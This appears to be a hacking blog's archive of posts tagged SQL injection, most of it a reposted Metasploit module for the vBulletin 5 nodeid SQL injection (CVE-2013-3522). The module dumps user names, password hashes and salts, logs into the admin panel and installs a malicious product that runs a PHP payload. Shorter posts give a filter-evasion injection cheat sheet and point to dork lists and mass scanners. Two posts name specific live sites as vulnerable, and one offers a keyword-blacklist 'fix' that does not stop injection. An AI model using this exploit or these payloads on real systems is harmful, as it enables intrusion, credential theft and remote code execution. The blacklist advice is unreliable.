Showing posts with label SQL Injection. Show all posts

Sunday, February 16, 2014

Kloxo SQL injection vulnerability and how to fix it

With this vulnerability, a hacker can gain unauthorized access to the Kloxo control panel with Admin rights. Since the issue is quite dangerous, I don't want to post the tool or an analysis of the bug; I'll just post the fix. Anyone who understands it can dig further on their own, and if you already know it, there's no point making it public either, because a lot of systems are running Kloxo right now.

* Threat: a hacker will be able to log in as Kloxo Admin and... do nothing at all?


This SQL injection bug lets an attacker log in as admin

Never mind that, let's go fix it!


Wednesday, December 11, 2013

vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection',
      'Description'    => %q{
        This module exploits a SQL injection vulnerability found in vBulletin 5 that has
        been used in the wild since March 2013. This module uses the sqli to extract the
        web application's usernames and hashes. With the retrieved information it tries to
        log into the admin control panel in order to deploy the PHP payload. This module
        has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu
        Linux distribution.
      },
      'Author'         =>
        [
          'Orestis Kourides', # Vulnerability discovery and PoC
          'juan vazquez'      # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-3522' ],
          [ 'OSVDB', '92031' ],
          [ 'EDB', '24882' ],
          [ 'BID', '58754' ],
          [ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]
        ],
      'Privileged'     => false, # web server context
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 10000 # Just a value big enough to fit any php payload
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'vBulletin 5.0.0 Beta 11-28', { }]],
      'DisclosureDate' => 'Mar 25 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new("TARGETURI", [true, 'The path to vBulletin', '/']),
        OptInt.new("NODE", [false, 'Valid Node ID']),
        OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),
        OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])
      ], self.class)
  end

  # Returns true when the given node id is usable for the injection
  def exists_node?(id)
    mark = rand_text_alpha(8 + rand(5))
    result = do_sqli(id, "select '#{mark}'")

    if result and result =~ /#{mark}/
      return true
    end

    return false
  end

  # Walks MINNODE..MAXNODE until a usable node id is found
  def brute_force_node
    min = datastore["MINNODE"]
    max = datastore["MAXNODE"]

    if min > max
      print_error("#{peer} - MINNODE can't be greater than MAXNODE")
      return nil
    end

    for node_id in min..max
      if exists_node?(node_id)
        return node_id
      end
    end

    return nil
  end

  def get_node
    if datastore['NODE'].nil? or datastore['NODE'] <= 0
      print_status("#{peer} - Brute forcing to find a valid node id...")
      return brute_force_node
    end

    print_status("#{peer} - Checking node id #{datastore['NODE']}...")
    if exists_node?(datastore['NODE'])
      return datastore['NODE']
    else
      return nil
    end
  end

  # Error-based injection: the query result is reflected inside the
  # "Database error" page, wrapped between two random marker strings
  def do_sqli(node, query)
    mark = Rex::Text.rand_text_alpha(5 + rand(3))
    random_and = Rex::Text.rand_text_numeric(4)
    injection = ") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) "
    injection << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) "
    injection << "AND (#{random_and}=#{random_and}"

    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
      'vars_post' =>
        {
          'nodeid' => "#{node}#{injection}",
        }
    })

    unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/
      return nil
    end

    data = ""

    if res.body.to_s =~ /#{mark}(.*)#{mark}/
      data = $1
    end

    return data
  end

  def get_user_data(node_id, user_id)
    user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")
    pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")
    salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")

    return [user, pass, salt]
  end

  def do_login(user, hash)
    res = send_request_cgi({
      'uri'           => normalize_uri(target_uri.path, "login.php"),
      'method'        => 'POST',
      'encode_params' => false,
      'vars_get'      => {
        'do' => 'login'
      },
      'vars_post'     => {
        'url'                       => '%2Fadmincp%2F',
        'securitytoken'             => 'guest',
        'logintype'                 => 'cplogin',
        'do'                        => 'login',
        'vb_login_md5password'      => hash,
        'vb_login_md5password_utf'  => hash,
        'vb_login_username'         => user,
        'vb_login_password'         => '',
        'cssprefs'                  => ''
      }
    })

    if res and res.code == 200 and res.body and res.body.to_s =~ /window\.location.*admincp/ and res.headers['Set-Cookie']
      session = res.get_cookies
    else
      return nil
    end

    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "admincp", "/"),
      'cookie' => session
    })

    if res and res.code == 200 and res.body and res.body.to_s =~ /<title>Forums Admin Control Panel<\/title>/
      return session
    else
      return nil
    end

  end

  # Extracts the session hash, admin hash and security token from an admincp page
  def get_token(response)
    token_info = {
      :session_hash   => "",
      :security_token => "",
      :admin_hash     => ""
    }

    if response =~ /var SESSIONHASH = "([0-9a-f]+)";/
      token_info[:session_hash] = $1
    end

    if response =~ /var ADMINHASH = "([0-9a-f]+)";/
      token_info[:admin_hash] = $1
    end

    if response =~ /var SECURITYTOKEN = "([0-9a-f\-]+)";/
      token_info[:security_token] = $1
    end

    return token_info
  end

  def get_install_token
    res = send_request_cgi({
      "uri"      => normalize_uri(target_uri.path, "admincp", "product.php"),
      "vars_get" => {
        "do" => "productadd"
      },
      "cookie"   => @session
    })

    unless res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
      return nil
    end

    return get_token(res.body.to_s)
  end

  def install_product(token_info)

    # Heredoc body is kept at column 0 so the XML declaration stays the first byte of the document
    xml_product = <<-EOF
<?xml version="1.0" encoding="ISO-8859-1"?>

<product productid="#{@product_id}" active="0">
<title>#{@product_id}</title>
<description>#{@product_id}</description>
<version>1.0</version>
<url>http://#{@product_id}.loc</url>
<versioncheckurl>http://#{@product_id}.loc/version.xml</versioncheckurl>
<dependencies>
<dependency dependencytype="vbulletin" minversion="" maxversion="" />
</dependencies>
<codes>
<code version="*">
<installcode>
<![CDATA[
#{payload.encoded}
]]>
</installcode>
<uninstallcode />
</code>
</codes>
<templates>
</templates>
<stylevardfns>
</stylevardfns>
<stylevars>
</stylevars>
<hooks>
</hooks>
<phrases>
</phrases>
<options>
</options>
<helptopics>
</helptopics>
<cronentries>
</cronentries>
<faqentries>
</faqentries>
<widgets>
</widgets>
</product>
    EOF

    post_data = Rex::MIME::Message.new
    post_data.add_part(token_info[:session_hash], nil, nil, "form-data; name=\"s\"")
    post_data.add_part("productimport", nil, nil, "form-data; name=\"do\"")
    post_data.add_part(token_info[:admin_hash], nil, nil, "form-data; name=\"adminhash\"")
    post_data.add_part(token_info[:security_token], nil, nil, "form-data; name=\"securitytoken\"")
    post_data.add_part(xml_product, "text/xml", nil, "form-data; name=\"productfile\"; filename=\"product_juan2.xml\"")
    post_data.add_part("", nil, nil, "form-data; name=\"serverfile\"")
    post_data.add_part("1", nil, nil, "form-data; name=\"allowoverwrite\"")
    post_data.add_part("999999999", nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")

    # Work around an incompatible MIME implementation
    data = post_data.to_s
    data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")

    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, "admincp", "product.php"),
      'method'   => "POST",
      'ctype'    => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie'   => @session,
      'vars_get' => {
        "do" => "productimport"
      },
      'data'     => data
    })

    if res and res.code == 200 and res.body and res.body.to_s =~ /Product #{@product_id} Imported/
      return true
    elsif res
      fail_with(Failure::Unknown, "#{peer} - Error when trying to install the product.")
    else
      return false
    end

  end

  def get_delete_token
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, "admincp", "product.php"),
      'cookie'   => @session,
      'vars_get' => {
        "do"        => "productdelete",
        "productid" => @product_id,
        "s"         => @session_hash
      }
    })

    if res and res.code == 200 and res.body.to_s =~ /SECURITYTOKEN/
      return get_token(res.body.to_s)
    end

    return nil
  end

  def delete_product(token_info)
    res = send_request_cgi({
      'uri'       => normalize_uri(target_uri.path, "admincp", "product.php"),
      'method'    => "POST",
      'cookie'    => @session,
      'vars_get'  => {
        "do" => "productkill"
      },
      'vars_post' => {
        "s"             => token_info[:session_hash],
        "do"            => "productkill",
        "adminhash"     => token_info[:admin_hash],
        "securitytoken" => token_info[:security_token],
        "productid"     => @product_id
      }
    })

    if res and res.code == 200 and res.body.to_s =~ /Product #{@product_id} Uninstalled/
      return true
    end

    return false
  end

  def check
    node_id = get_node

    unless node_id.nil?
      return Msf::Exploit::CheckCode::Vulnerable
    end

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "index.php")
    })

    if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/
      return Msf::Exploit::CheckCode::Detected
    end

    return Msf::Exploit::CheckCode::Unknown
  end

  def on_new_session(session)
    print_status("#{peer} - Getting the uninstall token info...")
    delete_token = get_delete_token
    if delete_token.nil?
      print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
      return
    end

    print_status("#{peer} - Deleting the product #{@product_id}...")
    if delete_product(delete_token)
      print_good("#{peer} - Product #{@product_id} deleted")
    else
      print_error("#{peer} - Failed to uninstall the product #{@product_id}, should be done manually...")
    end
  end

  def exploit
    print_status("#{peer} - Checking for a valid node id...")
    node_id = get_node
    if node_id.nil?
      print_error("#{peer} - node id not found")
      return
    end

    print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...")
    data = do_sqli(node_id, "select count(*) from user")
    # do_sqli returns nil on a failed request and "" when nothing was reflected
    if data.blank?
      print_error("#{peer} - Error exploiting sqli")
      return
    end
    count_users = data.to_i
    users = []
    print_good("#{peer} - #{count_users} users found")

    for i in 0..count_users - 1
      user = get_user_data(node_id, i)
      report_auth_info({
        :host  => rhost,
        :port  => rport,
        :user  => user[0],
        :pass  => user[1],
        :type  => "hash",
        :sname => (ssl ? "https" : "http"),
        :proof => "salt: #{user[2]}" # Using proof to store the hash salt
      })
      users << user
    end

    @session = nil
    users.each do |user|
      print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...")
      @session = do_login(user[0], user[1])
      unless @session.blank?
        print_good("#{peer} - Logged in successfully as #{user[0]}")
        break
      end
    end

    if @session.blank?
      fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel")
    end

    print_status("#{peer} - Getting the install product security token...")
    install_token = get_install_token
    if install_token.nil?
      fail_with(Failure::Unknown, "#{peer} - Failed to get the install token")
    end

    @session_hash = install_token[:session_hash]
    @product_id = rand_text_alpha_lower(5 + rand(8))
    print_status("#{peer} - Installing the malicious product #{@product_id}...")
    if install_product(install_token)
      print_good("#{peer} - Product successfully installed... payload should be executed...")
    else
      # Two situations trigger this path:
      # 1) Upload failed but there wasn't an answer from the server. I don't think it's going to happen often.
      # 2) New session, for example when using php/meterpreter/reverse_tcp, the common situation.
      # Because of that fail_with isn't used here.
      return
    end

    print_status("#{peer} - Getting the uninstall token info...")
    delete_token = get_delete_token
    if delete_token.nil?
      print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
      return
    end

    print_status("#{peer} - Deleting the product #{@product_id}...")
    if delete_product(delete_token)
      print_good("#{peer} - Product #{@product_id} deleted")
    else
      print_error("#{peer} - Failed to uninstall the product #{@product_id}, should be done manually...")
    end

  end

end

Source: http://www.exploit-db.com/exploits/30212/


Sunday, October 6, 2013

Web Hosting software WHMCS vulnerable to SQL Injection; emergency security update released


WHMCS, a popular client management, billing and support application for Web hosting providers, released an emergency security update for the 5.2 and 5.1 minor releases, to patch a critical vulnerability that was publicly disclosed.

Friday, June 28, 2013

Oracle SQL Injection Tutorial

Hello and welcome to an Oracle SQL injection tutorial. First you need to know that injecting into Oracle databases is not much different than injecting into others. The only differences are the syntax and different filenames etc... OK, if you know a site that is vulnerable to some sort of SQLi but you don't know what database it is, try the following code to check for an Oracle DB.

Tuesday, June 25, 2013

BIGGEST SQL Injection Dorks List ~20K+ Dorks


Here is the treasure, the biggest SQL dork list ever :)  Hope it helps some newbies out there:

Get it here: http://pastebin.com/2QqQh9jg

Master SQL Cheat Sheets With WAF


SQLi filter evasion cheat sheet (MySQL)
Basic filter

Comments
'Or 1 = 1 #
'Or 1 = 1 -
'Or 1 = 1 / * (MySQL <5.1)
'Or 1 = 1;
'Or 1 = 1 union select 1.2 as `
'Or # newline
1 = '1
'Or--newline
1 = '1
'/ *! 50000or * / 1 = '1
'/ *! Hay * / 1 = '1

Prefixes
+ - ~!
'Or - +2 = -!!! '2

Operators
^, =,! =,%, /, *, &, &&, | |, | |,, >>, <=, <=,,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, Least, Greatest , CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL


Tuesday, June 11, 2013

Tutorial: Fixing the SQL Injection bug in Music Gift for vBB

Go to AdminCP > Plugins & Products > Plugin Manager, then scroll down and find the plugin of the Music Gift mod.


Edit the plugin whose hook is ajax_start and add the following function at the beginning of the Plugin PHP Code section (this function filters the input of the SQL statement):

function anti_sql($sql) {
    // Keyword blacklist: strip the listed SQL tokens (case-insensitive) from the value
    // before it reaches the query; `*` and `)` must be escaped inside the pattern
    $sql = preg_replace("/(from|select|insert|delete|where|drop table|show tables|#|\*|--|\))/i", "", $sql);
    return trim(strip_tags(addslashes($sql))); // strtolower()
}



Thursday, March 28, 2013

vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

# Exploit Title: vBulletin 5 Beta XX SQLi 0day
# Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None


Wednesday, March 27, 2013

[SQLMAP] SQL Injection using the POST method


In this short and simple post, I'll detail the steps we take when we need to exploit an SQL Injection vulnerability, which is mostly found on some servers based on SQL Server and Oracle. These vulnerabilities are typical in administrative LOGINs, since, as we should know, when we enter the username and password this data is sent via the POST method; therefore it is possible that entering false data or some bypasses shows us an error that lets us identify the vulnerability, and it can then be exploited automatically using SQLMAP by running commands that send the request via POST and not via GET as is "usual".

Saturday, March 2, 2013

REAL SQL - V0.3 (SQLi Finder)

Here comes a post after a long holiday from blogging due to my exams. This is about one of my favourite SQLi scanners. It's called Real SQLi. Just found this, so thought of posting it here.
What it does is search through Google using Google Dorks and try each website for an SQL Injection vulnerability, and if it is successful it will return the vulnerable link to you!
This is the main GUI of the application, and in later screenshots I will show you its features.


Saturday, January 19, 2013

SQL Injection to Shell with SQLMap

A few days ago, while auditing a web server (a university's) based on Apache 1.3.26, PHP 4.2.1 for a client, I ran into the typical SQL code injection vulnerability, which easily allows obtaining the server's entire database, so I immediately started injecting manually, but to my luck!!! none of the injections and bypasses worked, so I asked myself why? if it's a dangerous and easily exploitable vulnerability, but then, analyzing again, I found the answer: it was a simple FP (false positive).

Saturday, January 12, 2013

[Warning] Dmart.vn - SQL Injection

  • Exploit: SQL Injection
  • Description: Query from TopX.
  • Severity: Critical.
  • Status: (Contacting the administrator).

Saturday, January 5, 2013

Online SQLi Scanner

An online SQLi scanner is the best thing you need when you are out of your private hacking room. So here is one more online SQLi scanner I found today, so sharing it with you people.

It's right here - http://www.poomplacedorm.com/hyde.php



Thursday, January 3, 2013

[Warning] Dalathoiquan.net

  • Exploit: SQL Injection
  • Severity: Critical.
  • Exploitation: Query to retrieve user information.
  • Status: (Administrator has been contacted).

Monday, December 24, 2012

SQL Injection - Labs series

Link to part 1: http://www.securitytube.net/video/4171
Link to part 2: http://www.securitytube.net/video/4200
Link to part 3: http://www.securitytube.net/video/4208
Link to part 4: http://www.securitytube.net/video/4210
Link to part 5: http://www.securitytube.net/video/4269
Link to part 6: http://www.securitytube.net/video/4283
Link to part 7: http://www.securitytube.net/video/4303
Link to part 8: http://www.securitytube.net/video/4326
Link to part 9: http://www.securitytube.net/video/4399
Link to part 10: http://www.securitytube.net/video/4532
Link to part 11: http://www.securitytube.net/video/4650
Link to part 12: http://www.securitytube.net/video/4667
Link to part 13: http://www.securitytube.net/video/4672
Link to part 14: http://www.securitytube.net/video/4672
Link to part 15: http://www.securitytube.net/video/5104
Link to part 16: http://www.securitytube.net/video/5562
Link to part 17: http://www.securitytube.net/video/6035
Link to part 18: http://www.securitytube.net/video/6176


WordPress - PICA Photo Gallery Automatic SQL Injection (perl)

# Exploit title: WordPress - PICA Photo Gallery Automatic SQL Injection (perl)
# Author: D35m0nd142
# Software Link: http://www.apptha.co...A-Photo-Gallery
# Google Dork: intext:"Powered by Apptha." inurl:gallery
# Thanks to Da0ne


Sunday, December 16, 2012

SQL Injection - Double Query - Tutorial

Hey guys,

Okay, so I will be showing you how to apply a Double Query Sql Injection...

So what you have to know is that the stuff you're going to read about here always works 100%, and I'm telling you that because I have 10 years' experience as a hacker, so suck it...